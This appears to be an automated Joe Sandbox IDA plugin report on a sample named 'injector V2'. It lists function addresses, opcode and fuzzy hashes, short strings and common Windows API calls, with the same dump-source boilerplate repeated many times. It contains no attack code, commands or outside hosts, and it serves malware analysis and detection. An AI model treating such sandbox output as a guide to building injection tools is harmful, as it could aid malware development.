Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: i.^$j.^
API String ID: 0-1036069679
Opcode ID: d087109eb099c2fb5ab8528ef2e32a37ebb898fabbd379cc2fa1eb36ba040ecc
Instruction ID: b39972b7eacc58a2c7a0aa23b5cb620b8f4f91b49de0b84d05968079cd545472
Opcode Fuzzy Hash: d087109eb099c2fb5ab8528ef2e32a37ebb898fabbd379cc2fa1eb36ba040ecc
Instruction Fuzzy Hash: E6813A352047004F9A2C8A285CE863EB3C6EF95365F7957A9F613D76F0DF258D458283

Function 00B2DA6C Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

c79u, xrefs: 00B2F3D4
XvIL, xrefs: 00B2CDE8

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: XvIL$c79u
API String ID: 0-4272471903
Opcode ID: 2c0990dcc30c5b0c65b2e8fb0cfd6d3f40152126065da67a494c9c47407cc6ed
Instruction ID: 1a3e91f8abad63049fc02d05efbee88f4c5d9fc0432a5e91a461f5f9759e86bf
Opcode Fuzzy Hash: 2c0990dcc30c5b0c65b2e8fb0cfd6d3f40152126065da67a494c9c47407cc6ed
Instruction Fuzzy Hash: 4E51AC356113219BDE2C9A24B9E9A3C7BE1DF58351B6502FDF80F57BB1D620EC848782

Function 00B55E22 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B55D7D,?,?,00000008,?,?,00B5594F,00000000), ref: 00B5604F

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d065cb3f21077e6ab720fc6870e263a2e6dd3c10c386b7ec84abfb5a71a8220b
Instruction ID: a78a5f1c1eec4997b017ffc70b4d25ac533b1601345ab5b459fa28ef433e5682
Opcode Fuzzy Hash: d065cb3f21077e6ab720fc6870e263a2e6dd3c10c386b7ec84abfb5a71a8220b
Instruction Fuzzy Hash: 9CB13931110A089FD725CF28C4DAB657BE0FF45366F6986D8E99ACF2A1C335D986CB40

Function 00B4F680 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4EB3E: HeapAlloc.KERNEL32(00000008,?,00000000,?,00B4CD28,00000001,00000364,00000000,00000002,000000FF,?,?,00B4E421,00B4DC80), ref: 00B4EB7F

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4F821
FindNextFileW.KERNEL32(00000000,?), ref: 00B4F915
FindClose.KERNEL32(00000000), ref: 00B4F954
FindClose.KERNEL32(00000000), ref: 00B4F987

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: c0a2a26b313c1469846fe50da1fe03ed80db95675701546e2b998ac871f67f98
Instruction ID: 95dd5effce4d5e6535595d2bdb47145ab5569a5eee812ae53b081e821185e276
Opcode Fuzzy Hash: c0a2a26b313c1469846fe50da1fe03ed80db95675701546e2b998ac871f67f98
Instruction Fuzzy Hash: 3651247590021AAFDF24AF389C85ABE77E9DF85358F1441EDF81997201EA348F41AB60

Function 00B498D5 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B498EB

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: b87590ce068a9f059d4fc24bcead31cd529148a2319119446e2f0a93033f9b92
Instruction ID: 608c1771c2aba19b4e6d17230fe177b54b4f8b61b8952222f9759d4b51fb992b
Opcode Fuzzy Hash: b87590ce068a9f059d4fc24bcead31cd529148a2319119446e2f0a93033f9b92
Instruction Fuzzy Hash: 69519AB1A103058FEB29CF59D8857AEBBF0FB48305F2485AAC419EB350E775DA40CB50

Function 00B496A3 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000297D0,00B49125), ref: 00B496A8

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c6bfc7f61933c4e7d015fedb625efc1af61c335a8b89d89539cdd5e26a899376
Instruction ID: c1a42fa247fc601252385e1b465b1fb9166aae621c8b56628788d68c9f290533
Opcode Fuzzy Hash: c6bfc7f61933c4e7d015fedb625efc1af61c335a8b89d89539cdd5e26a899376
Instruction Fuzzy Hash:

Function 00B32AE7 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

~bD`, xrefs: 00B32F67

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: ~bD`
API String ID: 0-944831652
Opcode ID: 7277de4186a7e949d020320b3874f7117147c68e686278fb7a12116549b54dab
Instruction ID: 38f40f9d415ec8283c6c7b9de9aef08868a2ac34076cdcea7b2a8dd1ebf7f01b
Opcode Fuzzy Hash: 7277de4186a7e949d020320b3874f7117147c68e686278fb7a12116549b54dab
Instruction Fuzzy Hash: 0A715876305B005B8A2C8F2C5DD8279B3D5EB95321F794BEBE412CB2E1EB25CD469602

Function 00B32B9B Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

~bD`, xrefs: 00B32F67

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: ~bD`
API String ID: 0-944831652
Opcode ID: a8807f8348f92e68556cb89ecd7cb0257a336f82ce82b7a73f3c73cbbea0644f
Instruction ID: 957d5bc68b16efaee0bfa2b872b6c5e6e52de3e2e0eed697aaa403380f1f823e
Opcode Fuzzy Hash: a8807f8348f92e68556cb89ecd7cb0257a336f82ce82b7a73f3c73cbbea0644f
Instruction Fuzzy Hash: F95159B5300700AFDB289F2C9DD5B29B3E5EB99320F3846E6E915CB3A5E725CC45C642

Function 00B32C40 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

~bD`, xrefs: 00B32F67

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: ~bD`
API String ID: 0-944831652
Opcode ID: 5f0ff9724cad275090b02dae28becf82aece36eb3c80f8f864f9b59515ae8548
Instruction ID: f065bd67f2716db30674caa2eb9561aa7706fb985f59f092215580660f998781
Opcode Fuzzy Hash: 5f0ff9724cad275090b02dae28becf82aece36eb3c80f8f864f9b59515ae8548
Instruction Fuzzy Hash: AC4116BA3007009FDB14DF389DD5B2973E6EB98320F3986A5E915CB3A5E735C845C642

Function 00B2D6B8 Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

XvIL, xrefs: 00B2CDE8

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: XvIL
API String ID: 0-558896452
Opcode ID: dfafb77d0243264e00a4303569719f254f34ee4167b641d5545d9f1a67587dac
Instruction ID: 81e3498a37e1a7f131bc8bcbdf1a46ad9cacfdf16361ec8ffa0635cc4d6d51af
Opcode Fuzzy Hash: dfafb77d0243264e00a4303569719f254f34ee4167b641d5545d9f1a67587dac
Instruction Fuzzy Hash: 36411774550214ABEE686F14F892A3C7BE1EF14315F5440E9F40E2B766D631AC848BC2

Function 00B2CD0A Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

XvIL, xrefs: 00B2CDE8

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: XvIL
API String ID: 0-558896452
Opcode ID: 782d90a90af8fd0ae873b36a97b0dd7af4a75ad349f922d7502658ccdcf1f734
Instruction ID: 50aad272a5704ea797ae2b0b1d9610d64ccdd7e36a810ffcc767f7947574ef57
Opcode Fuzzy Hash: 782d90a90af8fd0ae873b36a97b0dd7af4a75ad349f922d7502658ccdcf1f734
Instruction Fuzzy Hash: 653139756502109FDE2CAF14B8E6A3C7BE1AF15315F6841EDF40F67AB2D631AC848782

Function 00B2E350 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

XvIL, xrefs: 00B2CDE8

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: XvIL
API String ID: 0-558896452
Opcode ID: a83542875edebf467caeb1a9c1c9be948a58aa26dc54e04fcd74670979f7a696
Instruction ID: a0e5232e26ff882e51c3306a825bf28221e26b698c55e9469c8198707c8d7b1d
Opcode Fuzzy Hash: a83542875edebf467caeb1a9c1c9be948a58aa26dc54e04fcd74670979f7a696
Instruction Fuzzy Hash: 9A312670550221AAEE7C6B14B8E6A3C7BE1EF24351F6440EDF40F27A66D620AC8486C3

Function 00B2E93A Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

XvIL, xrefs: 00B2CDE8

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID: XvIL
API String ID: 0-558896452
Opcode ID: 5bfe44e2c699c40a095917c573883a8d26602cd442770f4529e7d90f062bc0d2
Instruction ID: 0990fa742f22ff97d44b851b84429694efb19efcfe474c5d9a212dcbad976b9d
Opcode Fuzzy Hash: 5bfe44e2c699c40a095917c573883a8d26602cd442770f4529e7d90f062bc0d2
Instruction Fuzzy Hash: 06315970550220ABEE6C6B14B8E6A3C7BE1AF24311F6440EDF40F27B66D631AC8487C3

Function 00B4CB10 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00B4CB10

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: c8fc9aabdb7cec2785edd16c6df5d223a6c1a5fcb846d4ff568375830c2a63d8
Instruction ID: f7e8ae0ade9bea7654d54ed7757b15fcadf4285e9d6b62c58b30d3b7d127be95
Opcode Fuzzy Hash: c8fc9aabdb7cec2785edd16c6df5d223a6c1a5fcb846d4ff568375830c2a63d8
Instruction Fuzzy Hash: 01A011302023008F83808F32AE083083AEAAA002C2B00C0A8A008C2220EE38A0008F00

Function 00B355F0 Relevance: .6, Instructions: 552COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 631910551cba97f46fd3a0cb5bd67795dd3754b19208285314dfa91fa88fdb11
Instruction ID: 9281044b62e77eb99db6f77444bb0b88021bd2472eef64766d044ee83c91b906
Opcode Fuzzy Hash: 631910551cba97f46fd3a0cb5bd67795dd3754b19208285314dfa91fa88fdb11
Instruction Fuzzy Hash: 38120939708B448BCE388E2894D453D73D2EB84715FB94AAEE867DB3A0DE20CD459753

Function 00B44170 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd45b2b35defecc3e622e7c9c9443a6b20c35b6a82b722e5e36ccbe723f242e
Instruction ID: 453ab81fef1f10d1088df85493cc90d88d2669f49e62b75fe4a6b9b28dcf8270
Opcode Fuzzy Hash: ebd45b2b35defecc3e622e7c9c9443a6b20c35b6a82b722e5e36ccbe723f242e
Instruction Fuzzy Hash: 27E1607A2143004F4D2CDE3869C472A77D2D7A5330B388AD2E822DB3E4DB75DF65A252

Function 00B46CD0 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a435d58fc13a636447adca197ae441271bdcc4626c8467758f86cc838c104e2
Instruction ID: bf57f3e73b624efeaae79f84d2a4646813c5f9c74dee0356c0fd97192130efae
Opcode Fuzzy Hash: 2a435d58fc13a636447adca197ae441271bdcc4626c8467758f86cc838c104e2
Instruction Fuzzy Hash: 66D1283975A3108F9D289638A5D522D33C28B96330B388BE5E521CB3E5EB65DF45E243

Function 00B25930 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9fa3b747a8d2419ebfeb7a9e1c2c88648204d5ce45078da1949f3035f47f48a
Instruction ID: 337ee9a41763cef9e87a3e9ba8ca7bbbbe83c41ac344bc69b86bcb42940e3edd
Opcode Fuzzy Hash: d9fa3b747a8d2419ebfeb7a9e1c2c88648204d5ce45078da1949f3035f47f48a
Instruction Fuzzy Hash: D5C1E636204B208B4A388B2865C963D73D3EBD57357795F96D42BCB3E8DB35CD828642

Function 00B46800 Relevance: .3, Instructions: 282COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c294a3fb0ed31826b1d2ed7067dc4f31dcd60eb2a9748b877af8db3fccaabe4d
Instruction ID: fda560a9801e254daa3b562d67f5843119d9bf34024343f39c50795176f7af62
Opcode Fuzzy Hash: c294a3fb0ed31826b1d2ed7067dc4f31dcd60eb2a9748b877af8db3fccaabe4d
Instruction Fuzzy Hash: A4A15B372047048BC62C8B2D99E563E77C3EBE2320B65869FC8135BBE0DE755E45A643

Function 00B34910 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd248431f2ce0840055f3601d2b5564f56b21af9cd763f98ca1cdd83a024352
Instruction ID: 62eac3744f8ceee564bab7d388e29c8ab2510ae8f244ea029fbeb3679a6b8158
Opcode Fuzzy Hash: 6fd248431f2ce0840055f3601d2b5564f56b21af9cd763f98ca1cdd83a024352
